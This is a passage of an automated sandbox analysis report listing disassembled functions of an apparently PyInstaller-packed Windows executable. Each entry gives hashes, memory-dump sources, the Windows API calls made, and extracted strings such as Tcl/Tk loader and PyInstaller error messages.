                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                          • String ID:
                                                                                          • API String ID: 377330604-0
                                                                                          • Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                          • Instruction ID: 5498fd00dd3f348ad2eb7c2b61c28bd4266554d1bdab68bd69cf4f7da56821eb
                                                                                          • Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                          • Instruction Fuzzy Hash: 2CD0C910F1954396FA242FB51E4643811B02FB7B27F600631E09DE22D0DE6CA0454A02
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6CEB28DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CEB22A9B), ref: 00007FF6CEB28E1A
                                                                                          • _findclose.LIBCMT ref: 00007FF6CEB281A9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_findclose
                                                                                          • String ID:
                                                                                          • API String ID: 2772937645-0
                                                                                          • Opcode ID: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                          • Instruction ID: b40d732f6c21e96f95af12a4b50b6e2cfe81db785ee1414ee2bfb672fd35a2dd
                                                                                          • Opcode Fuzzy Hash: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                          • Instruction Fuzzy Hash: 9B716E52E18AC581E611CF2CD6492FD6370FBB9B48F55E321EB9C62592EF28E2D5C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                          • Instruction ID: d51b483f4254a5457c8fede7491ddcb81c3912debc409cc6ef7d0eb0a0ac67af
                                                                                          • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                          • Instruction Fuzzy Hash: 0841E73294920147EA348F69E64217977B0EB67742F140231F6DEE3690CF2CF402CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                          • String ID:
                                                                                          • API String ID: 377330604-0
                                                                                          • Opcode ID: ef079cd77129d22be3eb03a79881853608d6625fc6b272817acf66f86254b52f
                                                                                          • Instruction ID: 3753b96984cde3a7769076cec94cb8e9af91d55f79fab7e4fdc4e60c7d8e2440
                                                                                          • Opcode Fuzzy Hash: ef079cd77129d22be3eb03a79881853608d6625fc6b272817acf66f86254b52f
                                                                                          • Instruction Fuzzy Hash: 46417316D1C78681EA119F2496062BD6370FFB6745F54A632EFCDA2193EF2CA5D8C300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fread_nolock
                                                                                          • String ID:
                                                                                          • API String ID: 840049012-0
                                                                                          • Opcode ID: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                          • Instruction ID: 8aad564e355a4ea39a6570193cf59c35bfab7da354a37d69237d5a4e74b427ce
                                                                                          • Opcode Fuzzy Hash: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                          • Instruction Fuzzy Hash: 3C21FC21B0969246FE509F2267097FAA665BF66BC5F8C4430FE8D97786DE3CE001C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                          • Instruction ID: cca9065e196739123ac7a028fea2677244056ae726b4d782e84633f3b64ef47a
                                                                                          • Opcode Fuzzy Hash: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                          • Instruction Fuzzy Hash: 2931A322E1960287F7155F958A423B82670AB62B97F410135FE9DE73D2CF7CF4418B61
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                          • String ID:
                                                                                          • API String ID: 3947729631-0
                                                                                          • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                          • Instruction ID: d35eeefd166152853927aff4d450554037e7c2a9dd4d37891fb11b10d93655e6
                                                                                          • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                          • Instruction Fuzzy Hash: B321B132A04A01CAEB218F64C0862BC37B4EB55319F240636E7AD97AC5EF38E445C780
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                          • Instruction ID: 2652b9b8e70ddb6823e30219a624ac5edc96afd37bffc855779a592332923879
                                                                                          • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                          • Instruction Fuzzy Hash: D811C631A0D64283EA60DF019602279A271AFAAB91F540131FACCA7B8ACF3CD4508741
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                          • Instruction ID: 6ce8bb6860eca078644736556e3d9c64d90e049c82c6b4b0d360a1976451401f
                                                                                          • Opcode Fuzzy Hash: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
                                                                                          • Instruction Fuzzy Hash: 58219D72A08A4287DB618F18E58037976B0EBA5B95F644235F69D976E9DF3CD800CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                          • Instruction ID: 71157ccc09c466eb2da387ac85a9efef63eeac0a27ceead1465ef911c8048c1a
                                                                                          • Opcode Fuzzy Hash: cb4a28c9cfe68d4bf5caf65282be0dfe2d74942f75b7edef78e8fd4dc80d0569
                                                                                          • Instruction Fuzzy Hash: 4C018821A08B4542EA04DF525A02179A7F5BF66FE1F484631FE9CB7BDADE3CE5118300
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 429e4ff91632884dbfd59807356ed260fa29108cd8906d3b6e9196ad5ea12367
                                                                                          • Instruction ID: 93ba07513a132e7cbd40dd57c7f13179e6076a69187e15c5f061b572f0ba7b9a
                                                                                          • Opcode Fuzzy Hash: 429e4ff91632884dbfd59807356ed260fa29108cd8906d3b6e9196ad5ea12367
                                                                                          • Instruction Fuzzy Hash: 02016D21E0E64282FF646F615743179A2B0AF22792F584235F9DDE37C6CF3CE4424202
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6CEB3C196,?,?,?,00007FF6CEB3B35B,?,?,00000000,00007FF6CEB3B5F6), ref: 00007FF6CEB3F99D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                          • Instruction ID: f05c5035c8053f234118b12e86c1f2f615f7b692bfdf2bf878d0dfae98a39e28
                                                                                          • Opcode Fuzzy Hash: 83da86fcac40c5efe6be46efa8cccb7ed61db28345aee0e9c2556edc7e0339ef
                                                                                          • Instruction Fuzzy Hash: FAF0AF25B0A242A3FE145FA15B533F442B34FA6B82F4C4230E88DE73C5DE1CE4804212
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,?,?,00007FF6CEB31514,?,?,?,00007FF6CEB32A26,?,?,?,?,?,00007FF6CEB34019), ref: 00007FF6CEB3E3EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                          • Instruction ID: c25919478729b9203c242637ac6601f8dcfb7a88fbab4ecc61b35ce198f23faa
                                                                                          • Opcode Fuzzy Hash: d8b55510c5610d80ab4c44b86d687719a9e038cf882b555fd49ed5282eff217e
                                                                                          • Instruction Fuzzy Hash: CFF05E01F1E38246FA155F615B5267992B04F66BA2F080631FAAEEB7C1DE2CE4818111
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 5d337e270712d004679ba659ef610f4cb2fc78abe2ab3a8c8a6757f66acf180b
                                                                                          • Instruction ID: b9d60aa407f53c8cc7a59bc9c75f30847fbc37a4424ada724db2fc243930b5b1
                                                                                          • Opcode Fuzzy Hash: 5d337e270712d004679ba659ef610f4cb2fc78abe2ab3a8c8a6757f66acf180b
                                                                                          • Instruction Fuzzy Hash: BCE0EC50E0AA0643FA547EE057C35B911314F7A342F605030FAC8AB3C3DD1CA8949A23
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                          • API String ID: 190572456-2208601799
                                                                                          • Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                          • Instruction ID: 48266bd12a4bea690f4ffcdd1a9f6fe2f8e80517ae2f42eb6ea9db433b112659
                                                                                          • Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                                                          • Instruction Fuzzy Hash: BCE1D461E1EB1391FA598F04EA8417423B1AF37753F949436F8CEAA3A4EF7CB5449200
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 808467561-2761157908
                                                                                          • Opcode ID: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                                                          • Instruction ID: 04a965d7b937dfa6a4e5522df267bda26a53ef5130fa3ca2b2586d341e3a5b3b
                                                                                          • Opcode Fuzzy Hash: c804c22466df2b92b362f5d1d066b057dea08e8c29dc99d8cb90910c2247e431
                                                                                          • Instruction Fuzzy Hash: 72B2F772E196828BE7258F64D7407FD77B1FB6534AF405136EA8DA7A84DF38A900CB40
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00007FF6CEB22A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB28797
                                                                                          • FormatMessageW.KERNEL32 ref: 00007FF6CEB287C6
                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FF6CEB2881C
                                                                                            • Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
                                                                                            • Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
